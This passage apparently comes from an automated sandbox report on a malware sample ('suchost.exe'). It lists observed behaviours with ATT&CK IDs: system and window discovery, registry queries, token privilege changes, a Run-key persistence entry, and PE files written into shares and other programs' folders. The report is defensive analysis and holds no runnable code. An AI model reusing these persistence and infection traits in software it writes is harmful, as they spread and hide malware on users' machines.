000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002084)\n \"suchost.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000030301000000bce50303b2f41f77b6a7057400000000a8112e000000026d18001a00d0000000e8000000e800026d00000000f4e4030308e6030354e8030395e11b77165a1900ff2b1f7732a7057420a3056dac01240000002400000000000000000019007f00d6000000c70221770100000078e50303000000001a007a00d6000000000200000000000050702400c8e703032000000080e5030300000000102e2a00406d2400606e2400b05f2f000872240000001a7730e50303c812026db0e6030395e11b77965e1900feffffffff2b1f779a2a1f7720a3056d10a3056d00000000 (UID: 00000000-00002084)\n \"suchost.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000240000000040e04c32008cf2230304641f7738012400e0631f770ab025740000000000002400e84c32006dd155759708398e6caeb37600000000000000001405000030ee2f00203024000100000000002400500124000c000000e84c320020302400020000021800000001020003be0000000000000000000000030000002cf22303be00000081010000000000006922004b3e000000c0755d75a09c320000000000c0755d7548f22303743024000000000020302400a0f22303dbd25575e84c320030ee2f000f08398ebe000000ff2b1f776eb025740000000004022400 (UID: 00000000-00002084)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003484)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003484)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003548)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005192)\n \"net.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000a7000f020000000000000000000000000000000000001200a2000f0200000000000000000000087016000000000020000000000000000000000098491800f86c1600186e160088e21800c07116000000000074f9500000000000d0fb500095e11b77b96c1900feffffffff2b1f779a2a1f7764c5ae76b69f1f77000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c5ae7688e2180064c5ae76 (UID: 00000000-00000768)\n \"net.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000768)\n \"net.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000768)\n \"net.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000001100a7000f0200000000000000000000087011000000000020000000000000000000000098491300f86c1100186e110058cf1300c07111000000000020f94c00000000007cfb4c0095e11b77b96c1900feffffffff2b1f779a2a1f7764c5ae76b69f1f77000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c5ae7658cf130064c5ae7600000000 (UID: 00000000-00003456)\n \"net.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003456)\n \"net.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003456)\n \"net.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002188)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"suchost.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"net1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"suchost.exe\" called \"IsWow64Process\" with parameter \"2084\" - (UID: 00000000-00002084)\n \"cmd.exe\" called \"IsWow64Process\" with parameter \"3484\" - (UID: 00000000-00003484)\n \"net.exe\" called \"IsWow64Process\" with parameter \"768\" - (UID: 00000000-00000768)\n \"net.exe\" called \"IsWow64Process\" with parameter \"3456\" - (UID: 00000000-00003456)\n \"net1.exe\" called \"IsWow64Process\" with parameter \"1284\" - (UID: 00000000-00001284)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"suchost.exe\" called \"GetWindowTextA\" with parameter \"MSCTFIME UI\" - (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetWindowTextA\" with parameter \"Default IME\" - (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetWindowTextA\" (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetWindowTextA\" with parameter \"CiceroUIWndFrame\" - (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetWindowTextA\" with parameter \"Start\" - (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetWindowTextA\" with parameter \"Network Flyout\" - (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetWindowTextA\" with parameter \"Task Switching\" - (UID: 00000000-00003172)\n \"suchost.exe\" called \"GetWindowTextA\" with parameter \"Start menu\" - (UID: 00000000-00003172)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"suchost.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00002084)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"suchost.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003172)\n \"suchost.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002084)\n \"net.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00000768)\n \"net.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003456)\n \"net1.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00001284)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"suchost.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002084)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"suchost.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\drivers\\*.* (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter 1394bus.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter 1394ohci.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter acpi.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter acpipmi.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter adp94xx.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter adpahci.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter adpu320.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter afd.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter agilevpn.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter AGP440.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter aliide.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter AMDAGP.SYS (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter amdide.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter amdk8.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter amdppm.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter amdsata.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter amdsbs.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter amdxata.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter appid.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter arc.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter arcsas.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter asyncmac.sys (UID: 00000000-00003536)\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"FindNextFileW\" with parameter atapi.sys (UID: 00000000-00003536)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"suchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"suchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"suchost.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002084)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"suchost.exe\" called \"InternetOpenA with parameter ErrCode\" (UID: 00000000-00002084)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"suchost.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00003172)\n \"suchost.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00002084)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"suchost.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"suchost.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"suchost.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-188", "relevance": 5, "name": "Calls APIs used for Remove Service", "description": "Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: 29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: setup.exe]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: 7zFM.exe]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: 7zG.exe]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: Uninstall.exe]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: suchost.exe]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: DW20.EXE]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"suchost.exe\" reads file \"C:\\$Recycle.Bin\\Desktop_.ini\"\n \"suchost.exe\" reads file \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\Desktop_.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"suchost.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"suchost.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"EXPLORER\"; Value: \"%WINDIR%\\system32\\drivers\\suchost.exe\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"suchost.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\¡¡¡¡¡¡.exe\": 4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a24370000000000000000 ...\n \"suchost.exe\" wrote 128 bytes starting with PE header signature to file \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"setup.exe\" has type \"PE32 executable (GUI) Intel 